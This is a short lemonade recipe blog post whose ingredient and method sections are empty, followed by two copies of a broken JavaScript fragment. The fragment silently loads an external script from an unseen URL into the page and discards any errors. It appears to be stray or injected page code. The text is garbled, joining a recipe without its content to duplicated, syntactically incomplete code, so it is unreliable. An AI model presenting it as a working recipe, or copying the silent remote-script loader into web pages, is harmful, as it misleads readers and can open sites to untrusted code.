Urban Diaries

Homemade Citrus Lemonade

Homemade Citrus Lemonade

I truly believe there is no better way to start your summer day than with a cold glass of homemade juice. 🙂

 

Homemade Citrus Lemonade
—————————————-
{Serves 6-8. Ready in 10 minutes.}

Ingredients:

The Stock Syrup

The Lemonade

 

Method:

 

 

I prepared this lemonade for my husband, and he gulped down the entire batch! That’s quite a compliment coming from a lemon lover like him. And now… I think it’s time to make some more. 🙂

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();